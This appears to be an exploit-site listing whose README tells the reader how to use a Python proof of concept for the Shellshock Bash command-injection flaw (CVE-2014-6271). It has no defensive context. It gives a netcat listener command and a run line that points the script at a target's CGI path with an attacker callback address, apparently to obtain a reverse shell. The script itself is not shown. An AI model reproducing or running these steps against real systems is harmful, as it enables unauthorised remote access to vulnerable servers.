Sploitus

Exploit for OS Command Injection in Gnu Bash

githubexploit Β· 2017-04-30

Exploit Code

README16 lines
## https://sploitus.com/exploit?id=CC72B335-B557-5510-B6B5-E8DF4913B708
# CVE-2014-6271
### python2.7

- Start listening on your machine.
```
nc -l -p 4444
```

- Run python script by the rule below: 
> python shellpoc.py \ \ 
```
python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444
```

- Enjoy